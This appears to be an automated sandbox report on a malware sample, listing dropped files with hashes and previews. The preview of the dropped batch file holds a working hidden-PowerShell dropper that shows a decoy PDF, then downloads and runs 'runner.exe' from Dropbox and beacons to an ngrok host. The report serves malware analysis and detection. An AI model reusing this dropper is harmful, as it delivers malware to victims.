                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):61147
                                                                                                                                                                                                                                                                  Entropy (8bit):5.078086286400755
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHBqdIJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPE
                                                                                                                                                                                                                                                                  MD5:96F9023163A6C17B352680E896DEA496
                                                                                                                                                                                                                                                                  SHA1:DD5EC72232854F5F14C41AFA756274139EBF4FCF
                                                                                                                                                                                                                                                                  SHA-256:A0D599D68CBF5FFC3B9B299967A6B8CCA4BE9B5F3E91EC70C50CBA413D0F2071
                                                                                                                                                                                                                                                                  SHA-512:CF42E8BD1F0ECA8E76D2FB6C7A0132B608D278893C067707FB0B912E1D47C7525E2D92D65EBD599D25453D1A5CF448364026B60133262C4662FDDC4EA6B1B6A2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0505636700495735
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:NlllulZljlZ:NllU
                                                                                                                                                                                                                                                                  MD5:1E3828534EF67C00436076993F6B6241
                                                                                                                                                                                                                                                                  SHA1:25852DB88891549C34DCB56149199510A300E198
                                                                                                                                                                                                                                                                  SHA-256:BCC8C0B84A119FBF1FE12091EC375F85E635C7C5533A21E4382C6C320EA702C7
                                                                                                                                                                                                                                                                  SHA-512:9B281462DFC7F52063615660BB122BA0A94B7D06DC404DB742CB022116DD0574726AC5AEE80313086CEC6B1917C70E8B20A0DE037C4D017BD38AC1F9D32C33DB
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:@...e................................................@..........

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\0b0fdb1c-0542-4fbb-8218-6bc8349e78b7.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):206855
                                                                                                                                                                                                                                                                  Entropy (8bit):7.983991878155761
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEIx:l81Lel7E6lEMVo/S01fDpWmEgr
                                                                                                                                                                                                                                                                  MD5:03E0A41C7EF64C946D818C2F5E4B7EC3
                                                                                                                                                                                                                                                                  SHA1:B3FEB76961D6A54EB9566EAC7E688BC55394B672
                                                                                                                                                                                                                                                                  SHA-256:CA2E03394F3B161D3A1E25F6A77B28EFDAB1D7989A0A1C2B6FC1764D8C27B7C7
                                                                                                                                                                                                                                                                  SHA-512:3F775790206CADE3A9CFBDCC3C081611330D525222D43085749A98D975B779109DF305799C53386E4B251D1D892735F5B4B31E6CD95475D0606BDD13BDB24001
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2949120
                                                                                                                                                                                                                                                                  Entropy (8bit):6.502462534743587
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:49152:hk8NZ7wn41Ba0Tfr/aC+1RIYkqYl+RjkgOQ1EIIH39yH0DLtx:pNpwn415ajvI1qYkrO9ftx
                                                                                                                                                                                                                                                                  MD5:F7A506F00E525E6D23AEE43D34219625
                                                                                                                                                                                                                                                                  SHA1:595AB94FA622DAFB3423F6F8AFFFC9B3E78BFB5D
                                                                                                                                                                                                                                                                  SHA-256:7ECD27F823A5D81FE3A3AD79287355DBD526518C5758994B8D728BDFBBBA4AC6
                                                                                                                                                                                                                                                                  SHA-512:465E92537A997DC30B909A8A2F7FB9956A495E52FC5736CA660CB0FA81F7BAFF6ACA80637F724875FBC3D0981A7D995C4C99F8AD9019689363CFA4E12A7B5C44
                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Qn..Qn..Qn......@n.......n......Cn......Gn.......n......Wn......Kn......Pn......Ln..Qn..qo.......n....A.Pn..Qn).Pn......Pn..RichQn..........PE..L.....f...............!.....4#...................@..........................P-......D"...@.................................."..........p. ..............)...........w..p...........................@v..@............................................text............................... ..`.rdata...`.......T..................@..@.data....`...@...>... ..............@....rsrc...p. ....... ..^..............@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\2e394d85-dadc-4bf8-b29b-63dee875f311.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\31824494-e908-42b2-958f-a125bf84a774.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41924
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):76314
                                                                                                                                                                                                                                                                  Entropy (8bit):7.996159328201069
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:1536:fFZ2cHkObrS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz88:fbb1UdS8scZNzFrMa4M+lKqeZ
                                                                                                                                                                                                                                                                  MD5:703D592C85D2790D89047C1614A54B4F
                                                                                                                                                                                                                                                                  SHA1:0C08F096AD544A63ACE8AA1AA738CC0B374F2A23
                                                                                                                                                                                                                                                                  SHA-256:A01513000969824FA1761DCDD77F5EE9B6FD958B4E9596522CEBC47BB69DF194
                                                                                                                                                                                                                                                                  SHA-512:D0C0F0B0A060D3DD52942556615B93971292E1F0C10555681CB6E4857E605EB2CFBACBADD263FB954D4062A63BBCCCB4B514428FDB95F6C0C94CC221B28B1ED5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...........}io.8..w... @*..S..=.X.v.^$..e..0..r.ek.,.+..x..._..$."..:.....]E>7..x..z...?..7t.s.....!/.."..}../....u...^..|{...B...]....q....Znh....;B.u....r.z..._.w~p.}<......B.....}k.........a....ur......:.E.~..f7!.....c....V.Z.."..._Q..m....?..q.......{;.V.g.".i..<.r=.9.>...}^.Ykw....\,. .. .<YkL........C*...........m.'....0O....g.?.8C............x.........=YO.......`.<....o..=..he..AaHy@g....z.)C..G....[.@.........x.......O...c..H..5..}..5$?.:....7g.....M~....4....u..P...c...S..w.(.2N['......&..v...."p.#..Z.F.<'._........&~CA......Z....p......>.o......m.(....a_%F.}r||z.m...1..8....p.-..4'.O....S0..f<.n...KP<.fd.....-w[B..%....Z!..H...C..CB+J)Ef.t[;.1.?.Q.j{.....*.y...>Y.......Me..Vx!.._...(>.......>.j.%.(..%]...E...~.p......tp.P.3........W>V&.J.s.]..../~.^.....u.X.1.J.6..8.^...Q.a8".z}....|.V.M".+..y.-...r..b..'k..9..~.@g3.:..n....M....s.T.#|.Vd.../..K<...^...p......X.5..6..F..".tO...........o}......}...D..`o....<..(....?..y.JQ.....F01a

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\3a544ce1-2ff1-40fb-9d16-240be780e2f8.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\6d0157c6-3d7d-48ab-8ec3-f1e0d1f3d02e.pdf

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:PDF document, version 1.7
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):656088
                                                                                                                                                                                                                                                                  Entropy (8bit):7.994208869820549
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:12288:r/TWRciaGbqp+t4v1TxPDt75QhxfR4/xFSnhfCsP10+:jTgc3Iq+0hxLt75Q6ZFShf/Pm+
                                                                                                                                                                                                                                                                  MD5:19E87DB70542A9FA556C1412E35FC300
                                                                                                                                                                                                                                                                  SHA1:B74FE6AB84969B938BF76E2A780546CFC727EAFB
                                                                                                                                                                                                                                                                  SHA-256:CF41E7881EC4A232F462EF0FC0E15C409619D18B3A8A84B49768268505AF80E3
                                                                                                                                                                                                                                                                  SHA-512:3983D20EF020BCAED0A3269CAE844B35BFCC99558820697517D4C9BDBD886D425A3236D08DB9194E816F0AACE2E6DDEFF0F95A693B4ED7FC3B91EBA018CEF440
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:%PDF-1.7.%.....18 0 obj.<<./Length 293./N 3./Filter /FlateDecode.>>.stream.x.}..J......(.....28.h..iRpi"..V..S..A.OHS..tspu+....c(....#....AR.x.......@.....?..F..[V[..G@`*...dK..$...O.K..o...@...6..`.O.,f'..O. .a.sx.0A..6..vf...8....{c7..%op..Z.:u.....Q.......0Q.F.....*....(.S....DGACAa..j.g.rx....]..s...PxM.......c...vhO.<..v....-X}...b3~...*....mDJH.T~...K..endstream.endobj.19 0 obj.<<./Type /XObject./Subtype /Image./Width 2400./Height 1363./ColorSpace /DeviceRGB./BitsPerComponent 8./ColorTransform 0./Filter [/FlateDecode /DCTDecode]./DecodeParms [null <<./Quality 45.>>]./Length 11488.>>.stream.x..}}p..y.}. ....:..4nA'`........I..e.....T].).E.!....&u..9.&k.0-.]A.......m...V.Lf.FP..!.4M..Q.......M......gw...=H....x.....o...........x&qj......F.3.}...O......}.?.......}.....~lq.-,}.g?....K......>......\_.....I..f.x.........G.....w....\:~9.|.".h2.h..7..5.Hf.._B.K.....G...:A>..D*.N......y........Sg.g....=..+..~.+.~...............N.wtl|..O..O......CO........B.r...|..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\749209598.bat

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with very long lines (822), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):839
                                                                                                                                                                                                                                                                  Entropy (8bit):5.62174633898337
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:0G89YrII4wvt/ZTt5AfSZ3vG3JkHuK89Fb/1MnzPWFrNG3JkAAAUOcpTRZ1Mngfp:0G/j59O3J792qtE3JSWSTRwg+3V+QKB
                                                                                                                                                                                                                                                                  MD5:E0E9D94EFD3D709A782370CE4E9D360B
                                                                                                                                                                                                                                                                  SHA1:66CBC18A5C70582292DF0E9A3713078B7C628D08
                                                                                                                                                                                                                                                                  SHA-256:B9FCD5A1688DC64AB3D4EBD6AF583CF0848D86A64919953D3113C7507DAC1444
                                                                                                                                                                                                                                                                  SHA-512:7347731100E8599B468E75FA7361AF7E5CA58C08B2DF7ED08FD6703A2F3C713F4C63DAC188FB3BBDB32639F776CC303FDBB4A6A96B8118DEFF1B66C43C99F28D
                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                  Preview:@echo off..powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6e'; }"..exit

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\925f82a8-ff91-485f-96ab-8e1b8e03cd0f.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 276634
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):263704
                                                                                                                                                                                                                                                                  Entropy (8bit):7.998798806129367
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:6144:cQBevuVtTT0bCnop1MIPG4y9XgcbKdhRuQRhzb6d0X7ayNC:TeGGCnorP0952dPuQRFW0X2yk
                                                                                                                                                                                                                                                                  MD5:B85DCDA827DC7BB4EF02A07D18DC64F4
                                                                                                                                                                                                                                                                  SHA1:9C284CF92B7C27D719A11396522EFC52196FD60B
                                                                                                                                                                                                                                                                  SHA-256:B9771078FC3B448D98FF53DE83C6C718326D6592F37CA48D3789120D41981FCA
                                                                                                                                                                                                                                                                  SHA-512:215C2A12292278EED6569C4730397FDA3B4188F76B5239F5783D24AA636A4D5103FED621D1D9B973605C754413597657BACFDEE46F203AAC006E24F9E8DF5691
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:............ko..q?....Am..0.<.M...e.B,[......|J..............x..8. .w73;;;;....L.....La.k&.k..........~...#..........%.Y.>}.j~.O.r..L....R.`..w......ta.'.....~:.9.'C...|..Gt...'..y..?...}..........,....1?..)QX....tgpgN.`..~...'.h.3^.s..UT...~o..R.].4^..V8"JwfnH...%..........i.qmG4.1@....a....\.i.C..Rq9.h....\..j...u..O..O.5!.}x....%j..}CW+.*..jaA.......-...*....P?..vA3+iU...N...%...x.E.8.Z..2HQw._.H8........+Lw].wL..........tc..l.+p..7..<).......Z.!..!i......?./.P9.y..;....,..C.K.....~.0........E...n..(..&.X...na-c.6.....Q.[.p.IO....[...W$....l7J.,..=EK.3Y...R...|..z_i.q......./.......[..5..qE.....FM+..VRB...r9!{3.....!...;.,{..}.sP..m..f.....~..2J..4.+..i6M...EW..ON..N.........4...T...j...1:..E=..<....Y..w.MV.....w.q.{...Y.....J...@.W..i.Sm;..0.1......./.4..b.wPbK.yeZ@.I...0.C.TZ$...-.+.[*......w.qG..}B^........n....#.........Y4.g4.....(.K..e..q7[.{..W....,%...z.^N...[/?......).9/?...r].oM2.'G.gu..Q|..._+......1^...9......-.j2lae..+!3

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2xs3wv5a.k43.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4lp1qeop.ebb.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqg0aiup.42i.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olegnyyw.abv.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y4qc3u4d.i3m.psm1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zozlqomb.dru.ps1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
